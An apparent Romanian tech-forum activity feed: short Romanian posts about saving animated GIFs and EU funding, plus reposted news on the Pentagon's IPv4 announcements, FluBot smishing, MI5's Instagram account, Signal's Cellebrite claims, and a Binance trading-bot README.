  15. ^ Local, nu imi imaginez cauza Uneori
  16. Am rezolvat cu wget Totusi nu inteleg de ce nu nu au frames gif-urile salvate, nu este un link anume, exif, etc, problema cred ca este din PC
  17. 1. Save As -> my computer -> open image.gif Sec 2. Reupload -> myhost.com -> url myhost.com/image.gif Sec in sensul ca devinde cumva .jpg, trebuie sa le urc pe host cumva prin url, iar eu le vreau la mine hostate, nu imgur, postimg etc... de aceea platesc Edit/ salvez o imagine.gif de pe postimg.com iar cand ii fac reupload pe imgbb.com nu are frame-uri
  18. Salut, ce va paste de craciun? On: ma confrunt cu o mica problema, incerc sa salvez un oarecare gif in Windows 10 din Opera, Chrome... s.a.m.d, insa imaginile raman intacte cand le deschid cu orice viewer, re-upload la fel. Multumesc
  19. Something weird happened minutes before Trump left—US says it was security research. The US Department of Defense puzzled Internet experts by apparently transferring control of tens of millions of dormant IP addresses to an obscure Florida company just before President Donald Trump left the White House, but the Pentagon has finally offered a partial explanation for why it happened. The Defense Department says it still owns the addresses but that it is using a third-party company in a "pilot" project to conduct security research. The number of Pentagon-owned IP addresses announced by the company rose to 56 million by late January and 175 million by April, making it the world's largest announcer of IP addresses in the IPv4 global routing table. The Post wrote: “SWAT team of nerds” The 6-year-old DDS consists of "82 engineers, data scientists, and computer scientists" who "worked on the much-publicized 'hack the Pentagon' program" and a variety of other projects tackling some of the hardest technology problems faced by the military, a Department of Defense article said in October 2020. Goldstein has called the unit a "SWAT team of nerds." The Defense Department did not say what the unit's specific objectives are in its project with Global Resource Systems, "and Pentagon officials declined to say why Goldstein's unit had used a little-known Florida company to carry out the pilot effort rather than have the Defense Department itself 'announce' the addresses through BGP [Border Gateway Protocol] messages—a far more routine approach," the Post said. Still, the government's explanation piqued the interest of Doug Madory, director of Internet analysis at network-security company Kentik. "I interpret this to mean that the objectives of this effort are twofold," Madory wrote in a blog post Saturday. "First, to announce this address space to scare off any would-be squatters, and secondly, to collect a massive amount of background Internet traffic for threat intelligence." New company remains mysterious The Washington Post and Associated Press weren't able to dig up many details about Global Resource Systems. "The company did not return phone calls or emails from The Associated Press. It has no web presence, though it has the domain grscorp.com," an AP story yesterday said. "Its name doesn't appear on the directory of its Plantation, Florida, domicile, and a receptionist drew a blank when an AP reporter asked for a company representative at the office earlier this month. She found its name on a tenant list and suggested trying email. Records show the company has not obtained a business license in Plantation." The AP apparently wasn't able to track down people associated with the company. The AP said that the Pentagon "has not answered many basic questions, beginning with why it chose to entrust management of the address space to a company that seems not to have existed until September." Global Resource Systems' name "is identical to that of a firm that independent Internet fraud researcher Ron Guilmette says was sending out email spam using the very same Internet routing identifier," the AP continued. "It shut down more than a decade ago. All that differs is the type of company. This one's a limited liability corporation. The other was a corporation. Both used the same street address in Plantation, a suburb of Fort Lauderdale." The AP did find out that the Defense Department still owns the IP addresses, saying that "a Defense Department spokesman, Russell Goemaere, told the AP on Saturday that none of the newly announced space has been sold." Bigger than China Telecom and Comcast Network experts were stumped by the emergence of Global Resource Systems for a while. Madory called it "a great mystery." At 11:57 am EST on January 20, three minutes before the Trump administration officially came to an end, "[a]n entity that hadn't been heard from in over a decade began announcing large swaths of formerly unused IPv4 address space belonging to the US Department of Defense," Madory wrote. Global Resource Systems is labeled AS8003 and GRS-DOD in BGP records. Madory wrote: In mid-March, "astute contributors to the NANOG listserv highlighted the oddity of massive amounts of DoD address space being announced by what appeared to be a shell company," Madory noted. DoD has “massive ranges” of IPv4 space The Defense Department "was allocated numerous massive ranges of IPv4 address space" decades ago, but "only a portion of that address space was ever utilized (i.e. announced by the DoD on the Internet)," Madory wrote. Expanding on his point that the Defense Department may want to "scare off any would-be squatters," he wrote that "there is a vast world of fraudulent BGP routing out there. As I've documented over the years, various types of bad actors use unrouted address space to bypass blocklists in order to send spam and other types of malicious traffic." On the Defense Department's goal of collecting "background Internet traffic for threat intelligence," Madory noted that "there is a lot of background noise that can be scooped up when announcing large ranges of IPv4 address space." Potential routing problems The emergence of previously dormant IP addresses could lead to routing problems. In 2018, AT&T unintentionally blocked its home-Internet customers from Cloudflare's new DNS service because the Cloudflare service and the AT&T gateway were using the same IP address of 1.1.1.1. Madory wrote: Madory's conclusion was that the new statement from the Defense Department "answers some questions," but "much remains a mystery." It isn't clear why the Defense Department didn't simply announce the address space itself instead of using an obscure outside entity, and it's unclear why the project came "to life in the final moments of the previous administration," he wrote. But something good might come out of it, Madory added: "We likely won't get all of the answers anytime soon, but we can certainly hope that the DoD uses the threat intel gleaned from the large amounts of background traffic for the benefit of everyone. Maybe they could come to a NANOG conference and present about the troves of erroneous traffic being sent their way." Via arstechnica.com
  20. The malware is spreading rapidly through ‘missed package delivery’ SMS texts, prompting urgent scam warnings from mobile carriers. Android mobile phone users across the U.K. are being targeted by text messages containing a particularly nasty piece of spyware called “Flubot,” according to the country’s National Cyber Security Centre. Victims are asked to download a fake app from a malicious website. Click to enlarge. The malware is delivered to targets through SMS texts and prompts them to install a “missed package delivery” app. Instead, it takes victims to a scam website where they download the “app” — which is really just the spyware. Once installed, it then sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information. It also sends out additional text messages to the infected device’s contact list, which allows it to “go viral” — like the flu. The U.K.’s National Cyber Security Centre (NCSC) has issued security guidance about how to identify and remove FluBot malware, while network providers including Three and Vodafone have also issued warnings to users over the text message attacks. So far, most of the phishing texts are branded to look like they are being sent from DHL, the NCSC said, but warned, “the scam could change to abuse other company brands.” One victim posted a message posing as a link from the Royal Mail. Another user on Twitter spotted this scam “Amazon” message which they point out swaps the “o” for a zero in the link. Telecom carriers Vodafone UK, Three UK and EE have all confirmed the scam is traversing their networks, which collectively have more than 58 million subscribers across the country. Anyone who receives what they believe to be a scam text is advised not to click on any links and forward the text to “7726” a “free spam-reporting line” established to combat fraud in the U.K. Finally, delete the message and block the sender. If a user has already clicked on the link, the NCSC warned not to enter any password or other personal information. To remove the malware from the infected device, “Perform a factory reset as soon as possible,” the NSCS guidance reads. “The process for doing this will vary based on the device manufacturer…Note that if you don’t have backups enabled, you will lose data.” The NCSC added that if a user has entered their personal information, it’s critical to change those passwords immediately to prevent further compromise. To prevent future attacks, NSCS said users should back up any important information, only install a minimal number of apps from trusted sources and use available virus protection offered by Google Play and others. SMS Phishing (‘Smishing’) On the Rise These types of SMS phishing scams, also known as “smishing,” aren’t anything new. In February, attackers were harvesting personal data of users in the U..K. with fake messages promising tax refunds for overpayment. Mobile phishing has been a booming business since the start of the COVID-19 pandemic, experts say, which they expect will only continue to grow. Paul Ducklin, researcher at Sophos, explained why smishing is becoming such a popular choice for threat actors in discussing the February campaign. Via threatpost.com
  21. Lockdown's getting to everyone – even the social media monkeys British domestic spy agency MI5 wants to dispel the idea it is staffed by martini-quaffing layabouts who spend implausible amounts of time lounging around top-end bars and hotels. It has therefore opened an Instagram account. News of the agency's foray into the Facebook-owned platform, which shows you heavily filtered photographs from the perspective of somebody whose world consists of estate agents' marketing photoshoots and perfume ads, came this morning as part of a recruitment drive. MI5 chief Ken McCallum said in a statement about @mi5official: "You can insert your own joke about whether we will be following you." The account can be viewed here, though to view posts on it you'll need to be a registered user. The first post by MI5 on Instagram was a photo of the entrance to its London HQ. We are sure MI5 is happy to have contributed towards Facebook's object-recognition AI project, given how the agency greedily hoovers up data about Britons' online habits in the hope of finding enemy spies, terrorists, criminals, and so on. We are told that "being more open" is the key to spy agency recruitment in the 2020s, with McCallum adding, for the Daily Telegraph: "We must get past whatever martini-drinking stereotypes may be lingering by conveying a bit more of what today's MI5 is actually like, so that people don't rule themselves out based on perceived barriers such as socio-economic background, ethnicity, sexuality, gender, disability, or which part of the country they happen to have been born in." Exactly how an Instagram account achieves that wasn't explained; the platform is famous for influencers grifters posing in bars, hotels, and holiday destinations while imperiously demanding free stuff from any business they encounter on their travels. The odds of MI5 becoming an influencer are probably low, though perhaps some future incarnation of James Bond's Q could become a profitable robot influencer. Lest anyone be fooled by this twee display, the agency's previous boss used his departure speech to call for E2E encryption on messaging platforms to be backdoored so his employees wouldn't have to work too hard. On the flip side, it does do some good in the world; earlier this week MI5's CPNI offshoot warned of hostile countries targeting British public-sector workers for recruitment as informants via LinkedIn. MI5 is also capable of being too sneaky: Surveyors from BT's mobile arm, EE, nearly proposed installing a Huawei mobile mast on the roof of a secret agency data centre in West London. ® Via theregister.com
  22. Automated Binance trading bot with trailing buy/sell strategy This is a test project. I am just testing my code. Warnings I cannot guarantee whether you can make money or not. So use it at your own risk! I have no responsibility for any loss or hardship incurred directly or indirectly by using this code. Before updating the bot, make sure to record the last buy price in the note. It may lose the configuration or last buy price records. Breaking Changes As I introduce a new feature, I did lots of refactoring the code including settings. If the bot version is lower than the version 0.0.57, then the update will cause lost your settings and the last buy price records. You must write down settings and the last buy price records and re-configure after the upgrade. If experiences any issue, simply delete all docker volumes/images and re-launch the bot. How it works Trailing Buy/Sell Bot This bot is using the concept of trailing buy/sell order which allows following the price fall/rise. The bot can monitor multiple symbols. Each symbol will be monitored per second. The bot is only tested and working with USDT pair in the FIAT market such as BTCUSDT, ETHUSDT. You can add more FIAT symbols like BUSD, AUD from the frontend. However, I didn't test in the live server. So use with your own risk. The bot is using MongoDB to provide a persistence database. However, it does not use the latest MongoDB to support Raspberry Pi 32bit. Used MongoDB version is 3.2.20, which is provided by apcheamitru. Buy Signal The bot will continuously monitor the lowest value for the period of the candles. Once the current price reaches the lowest price, then the bot will place a STOP-LOSS-LIMIT order to buy. If the current price continuously falls, then the bot will cancel the previous order and re-place the new STOP-LOSS-LIMIT order with the new price. The bot will not place a buy order if has enough coin (typically over $10 worth) to sell when reaches the trigger price for selling. Buy Scenario Let say, if the buy configurations are set as below: Maximum purchase amount: $50 Trigger percentage: 1.005 (0.5%) Stop price percentage: 1.01 (1.0%) Limit price percentage: 1.011 (1.1%) And the market is as below: Current price: $101 Lowest price: $100 Trigger price: $100.5 Then the bot will not place an order because the trigger price ($100.5) is less than the current price ($101). In the next tick, the market changes as below: Current price: $100 Lowest price: $100 Trigger price: $100.5 The bot will place new STOP-LOSS-LIMIT order for buying because the current price ($100) is less than the trigger price ($100.5). For the simple calculation, I do not take an account for the commission. In real trading, the quantity may be different. The new buy order will be placed as below: Stop price: $100 * 1.01 = $101 Limit price: $100 * 1.011 = $101.1 Quantity: 0.49 In the next tick, the market changes as below: Current price: $99 Current limit price: $99 * 1.011 = 100.089 Open order stop price: $101 As the open order's stop price ($101) is higher than the current limit price ($100.089), the bot will cancel the open order and place new STOP-LOSS-LIMIT order as below: Stop price: $99 * 1.01 = $99.99 Limit price: $99 * 1.011 = $100.089 Quantity: 0.49 If the price continuously falls, then the new buy order will be placed with the new price. And if the market changes as below in the next tick: Current price: $100 Then the current price reaches the stop price ($99.99); hence, the order will be executed with the limit price ($100.089). Sell Signal If there is enough balance for selling and the last buy price is recorded in the bot, then the bot will start monitoring the sell signal. Once the current price reaches the trigger price, then the bot will place a STOP-LOSS-LIMIT order to sell. If the current price continuously rises, then the bot will cancel the previous order and re-place the new STOP-LOSS-LIMIT order with the new price. If the coin is worth less than typically $10 (minimum notional value), then the bot will remove the last buy price because Binance does not allow to place an order of less than $10. If the bot does not have a record for the last buy price, the bot will not sell the coin. Sell Scenario Let say, if the sell configurations are set as below: Trigger percentage: 1.05 (5.0%) Stop price percentage: 0.98 (-2.0%) Limit price percentage: 0.979 (-2.1%) And the market is as below: Coin owned: 0.5 Current price: $100 Last buy price: $100 Trigger price: $100 * 1.05 = $105 Then the bot will not place an order because the trigger price ($105) is higher than the current price ($100). If the price is continuously falling, then the bot will keep monitoring until the price reaches the trigger price. In the next tick, the market changes as below: Current price: $105 Trigger price: $105 The bot will place new STOP-LOSS-LIMIT order for selling because the current price ($105) is higher or equal than the trigger price ($105). For the simple calculation, I do not take an account for the commission. In real trading, the quantity may be different. The new sell order will be placed as below: Stop price: $105 * 0.98 = $102.9 Limit price: $105 * 0.979 = $102.795 Quantity: 0.5 In the next tick, the market changes as below: Current price: $106 Current limit price: $103.774 Open order stop price: $102.29 As the open order's stop price ($102.29) is less than the current limit price ($103.774), the bot will cancel the open order and place new STOP-LOSS-LIMIT order as below: Stop price: $106 * 0.98 = $103.88 Limit price: $106 * 0.979 = $103.774 Quantity: 0.5 If the price continuously rises, then the new sell order will be placed with the new price. And if the market changes as below in the next tick: Current price: $103 The the current price reaches the stop price ($103.88); hence, the order will be executed with the limit price ($103.774). Frontend + WebSocket React.js based frontend communicating via Web Socket: List monitoring coins with buy/sell signals/open orders View account balances Manage global/symbol settings Delete caches that are not monitored Link to public URL Support Add to Home Screen Environment Parameters Use environment parameters to adjust parameters. Check /config/custom-environment-variables.json to see list of available environment parameters. Or use the frontend to adjust configurations after launching the application. How to use 1. Create .env file based on .env.dist. 2. Check docker-compose.yml for BINANCE_MODE environment parameter 3. Launch the application with docker-compose git pull docker-compose up -d or using the latest build image from DockerHub git pull docker-compose -f docker-compose.server.yml pull docker-compose -f docker-compose.server.yml up -d or if using Raspberry Pi 32bit. Must build again for Raspberry Pi. git pull docker build . --build-arg NODE_ENV=production --target production-stage -t chrisleekr/binance-trading-bot:latest docker-compose -f docker-compose.rpi.yml up -d 4. Open browser http://0.0.0.0:8080 to see the frontend When launching the application, it will notify public URL to the Slack. Install via Stackfile In Portainer create new Stack Copy content of docker-stack.yml or upload the file Set environment keys for binance-bot in the docker-stack.yml Launch and open browser http://0.0.0.0:8080 to see the frontend Screenshots Frontend Desktop Sample Trade Chart Buy Orders Sell Orders Last 30 days trade Trade History PNL Analysis Changes & Todo Please refer CHANGELOG.md to view the past changes. Update the bot to monitor all coins every second - #52 Display release version to the frontend - #59 Improve frontend & settings UI - #93 #85 Support all symbols - #104 Improve sell strategy with conditional stop price percentage based on the profit percentage - #94 Add sudden drop buy strategy - #67 Improve buy strategy with restricting purchase if the price is close to ATH - #82 Add minimum required order amount - #84 Add manual buy/sell feature - #100 Add stop loss feature - #99 Support multilingual frontend - #56 Reset global configuration to initial configuration - #97 Add frontend option to disable sorting Allow browser notification in the frontend Secure frontend with the password Develop simple setup screen for secrets Acknowledgments @d0x2f @Maxoos @OOtta @ienthach @PlayeTT @chopeta @santoshbmath @BramFr Contributors chrisleekr Romuald R. hipposen thamlth Download binance-trading-bot-master.zip or git clone https://github.com/chrisleekr/binance-trading-bot.git Source
  23. One of the biggest encrypted chat apps in the world just showed how a device used to decrypt messages can be hacked and tampered with. IMAGE: JACK GUEZ/AFP VIA GETTY IMAGES) Moxie Marlinspike, the founder of the popular encrypted chat app Signal, claims to have hacked devices made by the phone unlocking company Cellebrite, which has famously worked with cops to circumvent encryption such as Signal's. In a blog post Wednesday, Marlinspike not only published details of new exploits for Cellebrite devices, but seemed to suggest that Signal's code could be theoretically altered to hack Cellebrite devices en masse. Marlinspike claims (whether you believe this portion of the post or not is up to you) that while he was on a walk he happened to find a Cellebrite phone unlocking device: Cellebrite devices are used by cops to unlock iPhones in order to gather evidence from encrypted devices. This can include photos and messages on the device, potentially including Signal messages. Along with his colleagues, Marlinspike analyzed the device and found that it included several vulnerabilities that could allow an attacker to include an "otherwise innocuous file in an app" that when it gets scanned by a Cellebrite device exploits it and tampers with the device and the data it can access. To be clear, this is a pretty ballsy show of force. Marlinspike published details about the exploits outside of normal "responsible disclosure" guidelines and suggested that he is willing to share details of the vulnerabilities as long as Cellebrite does the same with all the bugs the company uses to unlock phones, "now and in the future." In a slightly nebulous final paragraph. Marlinspike said that future versions of Signal will include files that "are never used for anything inside Signal and never interact with Signal software or data," perhaps implying these could be designed to tamper with Cellebrite devices. We reached out to Signal to ask them to clarify what Marlinspike meant exactly in the last paragraph of his blog post. Cellebrite did not immediately respond to a request for comment. In their analysis of the device, Signal researchers also found that it contained packages signed by Apple, and likely extracted from the Windows installer for iTunes version 12.9.0.167. According to Marlinspike, this could be a copyright violation. Via vice.com
  24. Kev

    Fonduri europene

    off: aunci ce cauti aici? in caz contrar, munca bani, rabdare si xbox ce vrei
  25. Kev

    Fonduri europene

    Nu am cittit ce scrie fantoma in cazul in care ulterior ai o firma si, poti dovedi ca ai fost activ, obtii foarte usor fonduri. PS: multi cer comision PS2: grije ce semnezi
×
×
  • Create New...